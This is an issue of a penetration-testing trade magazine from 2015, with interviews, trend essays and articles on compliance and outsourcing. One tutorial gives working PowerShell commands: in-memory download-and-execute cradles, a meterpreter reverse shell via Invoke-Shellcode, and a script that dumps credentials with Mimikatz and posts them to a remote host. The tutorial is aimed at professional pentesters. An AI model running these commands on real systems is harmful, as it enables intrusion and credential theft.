ISSN 2084 - 1117 11/2015
PENETRATION TESTING AND VULNERABILITY ANALYSIS
TRENDS IN 2016
source:i.stack.imgur.com
INTERVIEW WITH KAI PFIESTER - FOUNDER OF BLACK CIPHER SECURITY PRIVILEGE ESCALATION WITH POWERSHELL IMPACT OF COMPLIANCE ON INFORMATION SECURITY AND MORE...
1
Managing Editor: Anna Kondzierska
[email protected]
Betatesters & Proofreaders: Sushil Verma, Ayo Tayo Balogun, Pierre-E Bouchard, John Webb, Jay Kay, Tom Updegrove, Ivan Gutierrez Agramont, Matthew Sabin, Amit Chugh, Steven Wierckx, Daniel Dieterle, Craig Thornton, Clancey McNeal, Paul Oyola, David Kosorok, Andrea Consadori, Jarvis Simpson, Elia Pinto, Daniela C Special thanks to the Beta testers and Proofreaders who helped with this issue. Without their assistance there would not be
a PenTest Magazine. Senior Consultant/Publisher: Pawel Marciniak CEO: Joanna Kretowicz
[email protected] DTP: Anna Kondzierska Publisher: Hakin9 Media Sp.z o.o. SK
02-676 Warsaw, Poland
ul. Postepu 17D
Phone: 1 917 338 3631
www.pentestmag.com
Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concering the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.
DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
2
Contents I think it is a great space to be in right now and for the future
interview with Kai Pfiester founder of Black Cipher Security
5
Future of Pentesting and its trends for 2016 and beyond
by Jaro Nemcok & Ondrej Krehel
10
Privilege escalation with PowerShell
by Jonathan H. Broche
13
Security vs. compliance and the role of the penetration tester
by Joshua Gold
20
What issues might occur in outsourcing to an SI
by Jim Hart
Pentesting a true art form
24
27
by Martin Brough
Think of security as a wheel and a never ending circle
interview with Martin Voelk CEO of Cyber 51
The sword and the shield
29
32
by Tom Updegrove
Impact of compliance on information security
by Ayo Tayo Balogun
36
3
Dear PenTest Readers, We would like to proudly present you the newest issue of PenTest Open, which is free to download for everyone interested in the topic. We hope that you will find many interesting articles inside the magazine and that you will have time to read all of them. We are really counting on your feedback here! We are approaching the end of the year, so it is time to think about future and the year 2016. In this issue we discuss the newest tools and trends that probably will play a big role in the coming months. You can read about privilege escalation with PowerShell and about Cobalt Strike. Have you ever thought what issues may occur in outsourcing to an SI - you can read what Jim Hart has to say about it in one of the articles. There are also two interviews with CEOs of penetration testing companies. Our first interview is with Kai Pfiester, the founder of Black Cipher Security. We discussed the challenges of managing your own company and the state of the industry as it is today and in the days to come. The second interview Martin Voelk, the CEO of Cyber 51. We talked about his endeavours in making security better and more available. You can’t miss it! The main aim of this issue is to present our publication to a wider range of readers. We want to share the material we worked on and we hope we can meet your expectations. With free account you have access to all the teasers and open issues, but we fully believe that you’d like to take this one step further and enjoy our publications without limits. Our premium subscription contains access to our whole archive. The virtual doors to our library are open for you! We’ve already started preparing the next issue of PenTest, which is going to be about Cloud Pentesting. If there is a tool you would like to write about or you are a company which wants a professional product review - contact us! We would also want to thank you for all your support. We appreciate it a lot. If you like this publication you can share it and tell your friends about it! every comment means a lot to us. Again special thanks to the Beta testers and Proofreaders who helped with this issue. Without your assistance there would not be a PenTest Magazine. Enjoy your reading, PenTest Magazine’s Editorial Team 4
I think it is a great space to be in right now and for the future interview with Kai Pfiester founder of Black Cipher Security
KAI PFIESTER
Founder of Black Cipher Security. He holds numerous IT security certifications such as Certified Ethical Hacker, OSWP and Security+. As an author he has written articles on cyber security for the NJ Law Journal, NJ Business magazine, Burlington Regional Chamber of Commerce and several online publications. As a speaker, he has done presentations for the Phi Alpha Delta Law Fraternity International, NJ Society
of CPAs, and several local business organizations. To contact Kai:
Phone: 609.284.6513
Email:
[email protected]
Web: www.blackcipher.com
[PenTest Magazine]: Can you tell us something about yourself? [Kai Pfiester]: I have been into IT since I first got introduced to the Apple IIe in middle school. Several years later, when I was about 10 years old, I saw the movie War Games and instantly knew I wanted
to get into cyber security at some point. Then, in the mid-90s, I saw the movie Sneakers and Hackers which really motivated me to get into the information security field. I started reading everything I could find from old issues of Phrack to 2600 to online forums and technical manuals. But back then there wasn’t as much information online as there is today. [PT]: And now, when you are working in the field, did reality meet the expectations? [KP]: Reality has definitely met my expectations. I love my job and feel I have found what I was born
to do. I am a chess player and I love a good challenge that forces me to think outside the box. Penetration testing and cyber security are, in my humble opinion, some of the most challenging fields to work in, since they are so dynamic. It is a game of constantly moving targets.
5
[PT]: What convinced you to establish your own company? [KP]: I decided to start my own IT security company around the time of the Target and Home Depot breaches. During that time period, it seemed like there was a new breach every other week or so. I came to the conclusion that cyber-attacks are only going to continue and only going to get worse. I enjoy helping people and love cyber security so it was a natural fit for me. [PT]: What kind of challenges did you face while creating your company? [KP]: There were, and still are, many challenges in starting my own company. For starters, I thought
I wouldn’t have to really sell anything. With all the hacking and data breaches at the time, I sincerely believed that other businesses would come running to me for help. However, that was not the case
as most business owners that I encountered didn’t think they were even worth a hacker’s attention.
So the primary challenge for me to this day is getting business owners to realize the need for
an effective information security plan. The next big challenge for me was to deal with all the other aspects of running your own business such as contracts, website design, marketing, business development, partnerships, taxes, etc., that come with being an entrepreneur. I am a technical person and so I had to learn all of the other stuff as I went along. [PT]: Your company provides services for small and medium companies. Do you find more firms are becoming aware of cyber-attacks? [KP]: Due to the media coverage, yes, more firms are becoming aware of the proliferation of cyber-attacks. However, they tend to still think that it won’t happen to them or that they haven’t been hacked yet. However, most are not keeping and monitoring logs so unless there is some blatant evidence of
a breach, they have no way of knowing if they’ve been compromised or not. [PT]: What do you think are challenges for firms who are between small companies and major corporations? [KP]: In my opinion the major challenges they face are deciding whether they need to outsource their IT security in order to keep costs down versus having their own in-house information security team. As we all know, if you have data and / or resources worth the attacker’s attention, you will be targeted at some point. [PT]: From your own experience, do you prefer to work with smaller or bigger companies? [KP]: I prefer to work with smaller companies as there is less bureaucracy and you can get to the heart of the matter (securing their infrastructure) quickly. [PT]: What are your general thoughts about development of cyber security market? [KP]: I think it is a great space to be in right now and for the future. When you consider how IT
is interwoven into almost every aspect of a person’s daily life, it is easy to see how crucial IT security
is and will be. From IoT to mobile apps to social media to corporate and government networks, the cyber security market is going to thrive well into the future. 6
[PT]: As a person who knows penetration testing tools a lot, do you think there are going to be any breakthrough changes in technology? [KP]: Absolutely! I think it is only a matter of time before quantum computers will be able to crack RSA encryption pretty quickly. Multi-factor authentication based on physical and / or behavioral traits seems to be the best approach to truly securing things. For instance, the banking industry is seriously considering using a person’s heartbeat to authenticate before granting access to certain financial services. [PT]: There seems to be a very strong push to get rid of passwords and replace them with more reliable solutions. What do you think about that? Is that a move in the right direction? [KP]: I completely agree that we need to get rid of passwords once and for all as a form of single-factor authentication. They can stick around if we use them only in multi-factor authentication scenarios. VCRs and video tapes were great when they first came out. They served their purpose well. But then came DVDs and now we are streaming video directly to our screens. Passwords are in the same boat. With superpowerful GPU-based password cracking machines, freely available wordlists, rainbow tables, etc, many common passwords can be cracked within a week to ten days. If passwords are accompanied by some form of two-factor authentication the account they are protecting is pretty safe. But I imagine it
is only a matter of time before that obstacle is overcome. [PT]: Can you tell us what is changing in terms of recruiting pen testers or cyber security specialists? Do you find it's going to be harder to find a job in this area? [KP]: I recently discovered a website called stealthworker.com that specializes in recruiting and staffing for cyber security. I imagine that there will be other sites like it and eventually there will be a clearing house, so to speak, where you can find the talent that you are looking for. As for finding a job in this area, no, I don’t think it is going to be harder. You cannot go wrong by specializing in IT. You can almost always find a job. As for the cyber security market, if you have the skills, there will always be work. Especially in the government sector. [PT]: Every day we can hear about new attacks. How do you see cyber threats evolving in the near future? [KP]: As cyber security product vendors make products better at detecting the subtlest attacks, attackers will be forced to evolve their attacks as well as their skillset. The human factor is always going to play a part since humans are the ones that can make the greatest security technology in the world completely useless by not configuring it correctly or by being social-engineered to turn it off. Leveraging Powershell in Windows is also a growing attack vector as it does not trip AV. So I imagine using a system’s tools against itself will also play a part in the types of attacks we see a lot of in the future. [PT]: Following previous question, do you find tools we have are good enough to ensure complete protection of a company? [KP]: The primary weaknesses in cyber security are threefold: humans, technology and processes. There is great security awareness training available for people so that is covered. There is also highly-effective data
7
security technologies as well as policies that govern how IT equipment and data should
be handled. So what, then, is the problem? The problem is that rarely are all three of these factors implemented together into a solid cyber security defense strategy. When they are, a data breach is
an extremely rare occurrence, if it ever is. [PT]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in 2016? [KP]: As more and more people get into the field we are going to see some really cool tools
be developed. I also think we are going to see more “frameworks” like SET and Metasploit be released. When parents have only one child, that child has no one to learn from. Most of his or her knowledge comes from single-handed experience. But the next child born into the family not only learns from their own experience, but learns from the other child as well. So the second child’s skillset develops faster than the first child’s skillset. We have the same situation with pen testing and vulnerability analysis
as well. These fields are young and the elders have set the stage with all their hard work and contributions. But I think the younger generation is going to improve and build upon the current foundation and develop tools that will be super effective in bypassing today’s defense technologies. [PT]: Do you have any thoughts or experiences you would like to share with our audience? Any good advice? [KP]: Never be so arrogant that you think you are unhackable or not worth an attacker’s time
or attention. I once had a business lead at a certain company and after talking to the company’s IT guy, he basically told me that he had all the company’s cyber security under control. At that point, I said OK and let it be. Six weeks later I get a call from him. He was in panic mode because his network had been hacked. They noticed more bandwidth than normal was being eaten up and tracked it to a specific server. Upon further investigation it had been hacked and was turned into a spam server. After checking the timestamps on certain files, it was determined that his network was hacked prior to, and during, the time he told me that he had all the network’s security under control and didn’t need my help. True security requires humility and constant vigilance.
8
source:hospitalitynet.org
Future of pentesting and its trends for 2016 and beyond by Jaro Nemcok & Ondrej Krehel
One of the predictions in 2016 is that it will be a year of Hacking the Code. Not DaVinci Code, computer code. This code contains vulnerabilities and it’s being exploited with underlying integrations and connections to various enterpriseclass systems.
The second prediction is that we will be seeing cybersecurity and incident response automation. This relates to the notorious erroneous nature of human beings, despite genuine talent, that creates this automation and digital world we know today. Penetration testing is, by many, already considered to be a “commodity” tactic today.
To achieve the best results, a pentester needs to combine various strategies, from leveraging the power of top-notch automated tools, a combination of manual and automated testing, writing their own tools for new technologies, a solid knowledge of the systems attacked, as well as scripting, social engineering, to dark web spider-intelligence, and more. Many popular penetration testing tools help penetration testers with creating fancy-looking reports that leave a great impression (and resonate well) with the client. Tools then combine online dark web data, perimeters, systems, and application layers
in one beautiful report with its own scoring schema. Oftentimes, the driving force
of penetration testing is a need to be in compliance with regulations instead of a genuine decision to actually improve security. The benefits of using automated tools are great and it is always a good idea to be equipped with the best tools available that can help automate the work as much as possible. You could almost think of
it as a scripted set of testing attacks with payload parameters. This is where we see the industry going. They do not have to be commercial. A great momentum exists in the open source community, including OWASP. Of course, with even more automation, there will still be a major difference in the quality of work between top penetration testers and an automated scan -“a vulnerability scan” does not equal
a “pentest”. The shift towards automation, however, can be a cost-efficient alternative for companies looking to save on basic penetration testing services and a good way for any penetration testers looking to save time and be more efficient.
9
One peculiar nightmare of automated tools is the ratio of false positives followed by ranking and
an interpretation of findings. Humans are still needed to properly categorize and eliminate false positives. Tools provide learning capabilities are far away from the popular terms of machine learning and intelligence, however.
As new tools and utilities are being introduced to help automate penetration testing tasks to such
a degree that would not have been possible just a few years ago, application complexity, technologies, and trends evolve exponentially with them. Although automation continues to be essential for pentesters, the challenges remain the same: every application is different, tools will heavily depend on user direction, since they cannot understand the context and semantic meaning, have no intuition, and cannot improvise nor adjust strategy. Pentesting strategies are now converted from one shot a year exercise to annual programs, where secure code review, static and dynamic, is combined with perhaps quarterly penetration test
of targeted areas. The financial sector, in particular, considers penetration testing as an annual product, versus a one-time service. Professional firms use human intellect and tools to setup whole cybersecurity code exploitations and development practices with emphasis on testing components. Effective penetration testing teams will consist of 3-5 highly trained professionals and specialists, executing the pentest assignment with well-rehearsed scrum efficacy, communication, division of tasks, re-prioritizing backlog, tracking, addressing new issues, strategically re-focusing to maximize value
of both individual and the team contribution, committing and owning the project from start to completion. Teams adapting lean methodologieswould typically achieve a velocity of at least double
of isolated individual contributors of same background New skillsets will be required in various emerging areas of penetration testing:
10
Mobile Devices -iOS, Android, or Windows based native applications, as well as a hybrid application assessment will become more and more important as the use of mobile devices will be gradually shifting from entertainment to business use and processing financial and other sensitive data.
Cloud and virtualization -software-defined network technology is new and changing rapidly - also changing is its threat landscape. This will require adjusting pentesting techniques with a matching speed.
Internet of things, embedded systems, pentesting/reverse engineering -office and home automation, vehicles, medical, payment, industrial control systems, switches, power converters, circuit breakers, and other devices are being connected to networks and therefore exposed to possible attacks - they all will need new and improved tools and approaches.
Ever evolving modern JavaScript based web applications
-to
assess security of such applications there will be a need to combine the classic crawling and scanning with a web browser engine, JavaScript debugger, forward/backward tracer, unpacking/de-obfuscation snapshots comparer, a script based state/variable alerting, injecting and fuzzing.
Wireless systems -Software-defined radio (SDR) based wireless security assessments, WiFi, smart meters, wearable devices, etc. - all this will require specific tools and skillsets.
Machine learning
-based anomalies detection will keep improving.Unfortunately, so do
counter-measures.
Internal network pentesting -will be used more as companies realize that to penetrate their internal networks using social engineering is a real possibility.
Social engineering
-as a part of pentesting, in the foreseeable future, we don't see
a possibility that an automated robot can get to a company building and ask somebody to "print his resume" from an USB drive. Remanence of Zeitgeist-old era are **legacy systems** with a plethora of well-humming and rather dated production deployment out there are great examples of pentester need. These systems will continue to require pentesting, which will not deviate greatly from currently-proven methodologies, and a skilled pentester is crucial for those precise military snipermissions. We do believe that in the near future and beyond (at least until the time when applications are fully developed and auto-improved by autonomous artificially intelligent agents), it will still be the human genius and intelligence, in-depth understanding, and efficient utilization of automated tools, which will determine the most successful pentesting outcomes. Terminator is an interesting concept and a movie, 11
only time will show how far an artificial intelligence will get and if the human genius will replace itself by fully automated systems. Do not forget, in the present days, it is the human hacking skillset that so far won the race against machines.
About the authors:
JARO NEMCOK
Web Security Researcher at LIFARS LLC, an international cyber security and digital forensics firm. He started his career in software development with focus on security and later moved to Information Security, focusing
on system audits, security/risk assessments, penetration testing, incident response to hacked web applications, and overall security.
He has almost two decades of cybersecurity experience, including vulnerability assessment, secure code review, cloud-based penetration testing, digital risk assessment, digital evidence acquisition, investigation
of web attacks, security assessments of Internet-facing applications, penetration tests across internal networks, development of testing scripts and procedures, and digital forensics. Jaro worked on many high-profile cases, including a much publicized Box.com and Dropbox leakage.
ONDREJ KREHEL
CEO and Founder of LIFARS LLC, an international cybersecurity and digital forensics firm. With over two decades of experience in computer security and forensics, he conducted a wide range of investigations, including data breached through computer intrusions, theft of intellectual property, massive deletions, defragmentation, file carvings, anti-money laundering, financial fraud, mathematical modeling and computer hacking.
Ondrej’s experience also includes advanced network penetration testing, database security testing, physical security assessments, logical security audits, wireless network penetration testing, and providing recommendations for operational efficiency of approaches. He is one of the few security experts in the world holding the Certified Ethical Hacker Instructor Certification (CEI). Ondrej worked on many high-profile cases, including a much publicized
12
Privilege escalation with powershell by Jonathan H. Broche
Privilege escalation is a task that proves difficult at times. In the past, one would rely heavily on metasploit as the full exploitation suite. With metasploit, one would not only be able to exploit a vulnerability but quickly elevate privileges with the get system command. However, with the landscape of cybersecurity constantly changing, it was only a matter of time before network administrators implemented new technological advancements that would detect and prevent most metasploit payloads. With one of pentester’s favorite tools now being detected, pentesters needed to find an alternative solution.
13
Welcome to the new era of pentesting, an era where dropping binaries onto victim systems is no longer required. An era where one can execute shellcode or obtain credentials in the clear without touching the file system. Welcome to the era of pentesting with PowerShell. This article aims to provide a technical introduction on how to use PowerShell to quickly escalate privileges on Windows operating systems.
THE WORLD OF POWER SHELL Since its release in November of 2006 (https://en.wikipedia.org/wiki/Windows_PowerShell), PowerShell has facilitated the jobs of several Windows administrators. With an array of methods and functionalities, PowerShell is much more powerful and diverse than its predecessor, the command prompt. However, despite PowerShell’s diverse functionality, there is one method that catches the eyes of pentesters, the DownloadString method. The DownloadString method is present in PowerShell version 2.0 and forward. When used, DownloadStringdownloads the contents of a webpage into a string. If the string downloaded happens to be a PowerShellscript then this can be executed. The best part? The execution would run
in memory, thus bypassing most security products and PowerShell’s script execution policy. To demonstrate the DownloadString functionality, I created a simple PowerShell script named ipconfig.ps1 and ran it on a fully patched Windows 10 operating system. The ipconfig.ps1 script identifies the version of PowerShell running and runs ipconfig. Table 1: Ipconfig.ps1 script contents $ver = $PSVersionTable.PSVersion.Major "You are using PowerShell version " + $ver ipconfig
There is an error when the script is run locally since PowerShell’s execution policy is set to restricted. This means that no PowerShell scripts can be run. Figure 1: PowerShell execution error
However, if the script is uploaded to a webserver and DownloadString is used, PowerShell’s execution policy is bypassed. Table 2: Example of PowerShell’sDownloadString functionality PS >IEX (New-Object Net.WebClient).DownloadString(“http://gojhonny.com/pentestmag/ipconfig.ps1”)
14
Figure 2: PowerShell DownloadString downloading and executing the ipconfig.ps1 script
Armed with this knowledge, pentesters started creating PowerShell scripts and combining them with the DownloadString method to bypass security restrictions. Today, two of the most widely used scripts are the Invoke-Shellcode and Invoke-MImikatz scripts. Both scripts may be found on MattGraeber’sGithub(https://github.com/mattifestation).
INVOKING SHELLCODE IN MEMORY The Invoke-Shellcode script allows pentesters to execute custom shellcode or payloads like metasploit’s reverse HTTP. The example below depicts the use of the DownloadString method to bypass security restrictions and execute a reverse metasploit HTTP payload in memory. The InvokeShellcode script was placed on a local webserver with the IP of 192.168.146.132. Table 3: Example of PowerShell DownloadString Invoke-Shellcode command PS >IEX (New-Object Net.WebClient).DownloadString("http:///InvokeShellcode.ps1") PS >Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost -Lport
Figure 3: PowerShell DownloadString downloading and executing the Invoke-Shellcode script
After executing the script on the victim system, one should have obtained a shell as shown in Figure 3.
Figure 4: Reverse HTTP shell obtained by using the Invoke-Shellcode script
15
OBTAINING CACHED CREDENTIALS IN MEMORY The Invoke-Mimikatz script is a port from Benjamin Delpy’sMimikatz created by Joseph Bialek. Mimikatz assists pentesters by obtaining and outputting cached credentials in clear text. Again, the example below shows sample usage of the Invoke-Mimikatz script using the DownloadScript method. Table 4: Example of PowerShell DownloadString Invoke-Mimikatz command PS >IEX (New-Object Net.WebClient).DownloadString("http:///InvokeMimikatz.ps1") PS > Invoke-Mimikatz –DumpCreds
Figure 5: Execution of Mimikatz in memory with PowerShell DownloadString
The ability to execute this script in memory is incredibly powerful for pentesters. Imagine recursively obtaining the credentials of all systems in a domain. One would be able to obtain domain administrator credentials in seconds and successfully escalate privileges. This is where CredCrack comes in.
A U T O M AT I N G P R I V I L E G E E S C A L AT I O N W I T H CREDCRACK Pentesters love automation, in fact we love automating as many things as possible. Thankfully, there are tools that have been created to automate exploitation and privilege escalation and make the lives
of pentesters easier. With great tools, such as Empire, PowerUp and CredCrack, one may go from domain user to domain administrator in seconds. The following section will demonstrate how to use CredCrack, a popular credential harvesting script. CredCrack was created and released by myself, Jonathan Broche, in August of 2015(http://blog.gojohnny.com/ 201508/domain-administrator-in-17-seconds.html). Since then, it has become a popular tool amongst pentesters and with the online community. CredCrack has two main functionalities: share enumeration and credential harvesting. Table 5: CredCrack's help menu
16
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es] [-l LHOST] [-t THREADS] CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny) optional arguments: -h, --help show this help message and exit -f FILE, --file FILEFile containing IPs to harvest creds from. One IP per line. -r RHOST, --rhost RHOST Remote host IP to harvest creds from. -es, --enumshares Examine share access on the remote IP(s) -l LHOST, --lhost LHOST Local host IP to launch scans from. -t THREADS, --threads THREADS Number of threads (default: 10) Required: -d DOMAIN, --domain DOMAIN Domain or Workstation -u USER, --user USER Domain username Examples: ./credcrack.py -d acme -u bob -f hosts -es ./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Once domain user credentials have been compromised, it is recommended to use CredCrack’s share enumeration functionality to identify systems the compromised user has administrative access to. The share enumeration functionality uses the SMB protocol to test shares for write access on the systems provided.Systems that grant read/write access to its administrative share (“C$”) indicate that the user has local administrative access. Figure 6: Enumerating share access with CredCrack
After using the share enumeration functionality, the pentesterwould create a list of systems with administrative access and feed them into CredCrack’s credential harvesting functionality.
17
CredCrack’s credential harvesting works by executing the Invoke-Mimikatz script using PowerShell’sDownloadString method against the provided systems. Victims will execute InvokeMimikatz and send the credentials over an HTTP POST request back to the pentester’s system. Figure 7: Illustration of CredCrack sending Invoke-Mimikatz to victim systems
Below is the initial PowerShell script victims will be executing: Table 6: PowerShell script CredCrack will execute on victims IEX (New-Object Net.WebClient).DownloadString('http:///InvokeMimikatz.ps1'); $creds = Invoke-Mimikatz -DumpCreds; $request = [System.Net.WebRequest]::Create('http::///creds.php'); $request.Method = "POST"; $request.ContentType = "application/x-www-form-urlencoded"; $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse();
Once Mimikatz has been executed on the victim system through PowerShell, it will send the credentials in a POST request to the pentester's system. Figure 8: Illustration of CredCrack sending credentials in a POST request back to the pentester
After all victims have finished the execution of Mimikatz, CredCrackwill search for any matches against the domain administrator's list to see if a domain administrator account was obtained and if so, output the account’s credentials.
18
Figure 9: CredCrack output
Domain administrator in just 10.9 seconds! CredCrack has proven to be one of the fastest ways to escalate privileges in large enterprise environments and is just one example of the several powerful tools available for pentesters today.
CONCLUSION There are several ways to escalate privileges on a network and the aforementioned tools are just
a handful of them. The cyber security landscape is always changing and there is always something to be learned. Try the methodologies mentioned in upcoming pentests and do not be discouraged from researching new methodologies and building the next best tool! About the author: JONATHAN H. BROCHE
computer security professional with over ten years of hands-on experience in the Information Technology field. He specializes in penetration testing, social engineering and system security configurations. Jonathan has a bachelor's degree in Information Technology from Florida International University with concentrations in application development and UNIX administration. Additionally, he has earned certifications from Offensive Security (OSCE, OSCP, OSWP) and the Global Information Assurance Council (GSEC).
Jonathan is also a researcher, writer and speaker. His latest contribution to the industry is the renowned CredCrack tool which gained international attention upon its release. Jonathan is an active member of several security-related organizations such as local ISSA and OWASP chapters and frequently participates in capture the flag events. In his free time he enjoys mountain biking.
19
Security vs. compliance and the role of the penetration tester by Joshua Gold
In regulated industries, it has become common practice for management to assume that compliance and security are one and the same. They believe that because an auditor has marked them as being compliant, there are no further actions that need to be taken to secure their systems. The idea that because something is compliant, it must also be secure has become an inside joke among security professionals; unfortunately, those same professionals are often incapable of translating to management exactly why a compliant system is not necessarily secure.
INTRODUCTION In January of 2011, the United States Government Accountability Office (GAO) reported to Congress that “Utilities are focusing on regulatory compliance instead of comprehensive security” and that “security requirements are inherently incomplete, and having a culture that views the security problem as being solved once those requirements are met will leave an organization vulnerable to cyber-attack.”It is not only utilities that suffer from this problem; in the last 18 months, over 150 million credit cards numbers and protected health records have been stolen from companies that had all been found compliant
in their most recent assessments. Companies like Target, JP Morgan, Home Depot, and Neiman Marcus (to name only a few) have learned just how short of true security a compliant program can leave you. In regulated industries, it has become common practice for management to assume that compliance and security are one and the same. They believe that because an auditor has marked them as being compliant, there are no further actions that need to be taken to secure their systems. The idea that because something is compliant, it must also be secure has become an inside joke among security professionals;unfortunately, those same professionals are often incapable of translating to management exactly why a compliant system is not necessarily secure.
20
THE ROLE OF THE PENETRATION TESTER Most experienced penetration testers know the feeling of arriving on site to a new client and having the security administrators almost beg to have their systems compromised. They are aware
of how vulnerable they are, but have been unable to secure the budget to do anything about it. They believe that the only way
to do so is for the penetration test report to show management exactly how secure their compliant system is. Oftentimes throughout the drafting of the report, the security administrators will request specific wording or recommendations that they believe will help them convince their management team that something more needs to be done.
However, it is also important for the penetration tester to be aware of and knowledgeable about the regulations with which their client must comply It is no secret that many companies value third party input much more highly than they do internal recommendations. A request that has been made multiple times from a security team may sudden be fulfilled if it comes as a recommendation in a third party report. As such, it is often the responsibility of the penetration tester to identify the areas where management has been lax in assigning resources and prioritize their recommendations accordingly. If it is clear that large amounts of 21
the security budget is being directed towards a brand new Security Incident and Event Manager (SIEM), but the security staff doesn’t have the knowledge or training to support that SIEM, it is important for the penetration tester to recognize this and recommend training for the security staff. Writing a report that recommends changes that fall far outside the scope of the client’s compliance needs is as likely to create meaningful change as not writing the report at all. On the other hand, if the report can be aligned with the client’s compliance goals, it becomes far more likely that management and the security team will utilize it to achieve not only greater security, but also stronger compliance.
IF COMPLIANCE ≠ SECURITY, WHY BOTHER? Many people question the necessity of regulations, as they do not necessarily engender true security. The thinking is that if companies are left to their own devices, they will develop a security posture commensurate with their risk. To a certain extent, this line of thinking has its merits. However, one can easily compare the security posture of the U.S. Electric Utilities (regulated by the NERC CIP Standards) to those of the U.S. Water Utilities (unregulated). Both utilities are considered Critical Infrastructure, and both face the same sort of cyber threats. The NERC CIP standards have forced the electric industry to implement a minimum standard of security. Many utilities have taken the approach of “doing things right” as long as they have to do them for compliance. These utilities are using their compliance burden to drive budget into their security departments, and to secure upper management buy-in. The water industry, on the other hand, is often described as “The Wild West” by security experts. The lack of any regulation has led to a huge spectrum of security postures. Some utilities are taking the threats they face seriously, and have state of the art defenses in place. Other utilities still have SCADA systems directly connectable via dial-up without any authentication in place. This is not from a lack of effort on the part of the security teams at these utilitiesit is often a lack of motivation, and sometimes understanding, on the part of upper management.
It is clear that compliance does have an impact on the overall level of security that can be expected in an industry. Compliance has given the electric utilities the motivation and justification to fight for greater budgets. Security and compliance teams can take hard numbers to upper management to show that
an expenditure of $100,000 can prevent a fine of $1,000,000. Security teams in the water industry that want to spend the same amount are often left with no compelling way to justify the expenditure in terms that management is likely to understand. 22
WHAT CAN BE DONE TO INCREASE SECURITY AND COMPLIANCE? It is clear that compliance does have an impact on the overall level of security that can be expected in an industry. However, it is also clear that as the compliance burden grows, companies begin to shift their focus towards meeting compliance, rather than becoming truly secure. As an independent third party, it is important for the penetration tester to maintain an objective view of the overall security posture and the machinations that have brought it about. In the end, it is the goal of every penetration test to help the client become more secure. Often this is accomplished by demonstrating weaknesses in target systems and advising on mitigating the risk to those systems. In a regulated industry, those mitigation plans may need to align with the overall compliance goal while still reducing the overall vulnerability of the system. Through this alignment, the penetration tester provides the means for security teams to fight for and receive the funding and support that makes true security possible. Perhaps the best way for penetration testers to accomplish this is to become an expert on the compliance burden faced by their clients. Penetration tests for the electric industry should be conducted by NERC CIP experts, penetration testers for the the health industry should be HIPAA experts, and penetration testers for the retail industry should be PCI-DSS experts. A good NERC CIP pentester could certainly find plenty of vulnerabilities in a hospital’s systems, but their report would not be nearly
as complete or compelling as one written by a HIPAA expert--to say nothing of a penetration tester who has no compliance knowledge at all. The ability to custom tailor report findings towards specific compliance burdens will allow penetration testers to better serve their clients and help increase the overall level of security from compliance-driven entities. About the author: JOSHUA GOLD
Security Consultant with Network & Security Technologies, which provides consulting services primarily to the U.S. Electric Industry. Mr. Gold was awarded a B.S. degree in Cybersecurity from the University of Maryland system and maintains a number of industry certifications. He also volunteers his time with the National Emergency Management Teams (Region 2, Communications Division) where he actively assisted in the recovery
of businesses in New York City after Hurricane Sandy in 2012.
23
What issues might occur in outsourcing to an SI by Jim Hart
source:http://cdn.cfo.com
Many large organizations use a system integrator (SI) to provide their IT infrastructure and associated services. There is also a growing trend to use multiple suppliers to deliver the holistic service that was once provided by a single SI. In either case, using SI(s) can significantly impact the efficacy of Penetration Testing unless the issues are recognized and managed early on by the organization being tested. Penetration testing is typically performed for a set number of reasons, often at pre-determined intervals and for pre-determined in-scope systems. Other testing may occur ad-hoc as required after significant changes to the environment. Pre-determined testing is again sub-divided into evaluating security weaknesses with the intention
of maintaining a good level of protection, or as part of a regulatory requirement for annual testing such as PCI. How effective the penetration testing is may be highly dependent on the type of engagement the organization has with the SI – and not necessarily the SI itself. A good example here is based on our experiences of IBM, Fujitsu, CGI and others. The SIs themselves all have the skills and capability to offer a highly effective all-round service delivering on the promises set out when a contract is negotiated. However, depending on the contract negotiated, the organization will receive different levels of service highly correlated to the value of the overall contract with the
SI (basically - you get what you pay for). So, while at a high level and on paper, services provided in the bundle by the SI, like Penetration Testing, may look comprehensive and tick all the right boxes – but
do they really deliver what the organization needs? In our example above, the SI may deliver the regular penetration tests on time and per the pre-defined scope, generally satisfying the term of the contract but not necessarily satisfying the need to effectively secure the organization and to assure full compliance against any regulatory requirements. Gaps only 24
become apparent once the organization actually looks more deeply at the nature of the testing, how
it was initiated and performed. It is important to regularly ask questions of the SI such as how deep was the testing and how was the scope validated? When you look at the small print of what was actually agreed, you may find the level
of testing agreed to was actually only superficial and mostly automated scanning – hardly real penetration testing at all. This may be far below the actual capability of the SI, and maybe they did not engage their top-tier testers or allow as much time as required to do a truly effective job at identifying the more subtle issues. Unless the organization employs specialists who examine or validate the level
of testing, there may be an assumption that everything is fine as ‘penetration testing’ is completed regularly. Scope is another important factor. The SI will typically be very good at keeping a complete and up
to date list of all the assets being managed, as that is effectively their only way of accurately calculating the service costs, so it is in their interests to manage that list well. What the asset list does not do, however, is keep a true track of what should be part of annual testing. From a PCI perspective, maybe
it is effective – as long as the organization has kept the SI informed of which applications or data sets may be considered as within a PCI scope. This is not always something that is as black and white as
it should be, for not all organizations have cleanly defined network scopes or security zones. For those organizations where a PCI scope may bleed into other networks due to applications being connected to the PCI zones, unless the SI and the organization are both synchronizing their view of PCI scope, things may be lost in translation. This can leave some potentially valuable PCI targets out of scope for the annual testing.
The SI may continue to deliver per the contract and report all is well, and the organization may assume all of PCI is being regularly tested as the loss of synchronization of asset details goes unnoticed. It is not until there is a breach, or possibly worse still – the PCI auditor questions why some systems were missed out – that the organization becomes aware of this situation. The same scenario applies to ‘critical’ systems which contain confidential data, etc. The organization must ensure the scope the SI is working to is kept up to date so the right systems get tested, and it is not generally the responsibility of the SI to pro-actively obtain this information. 25
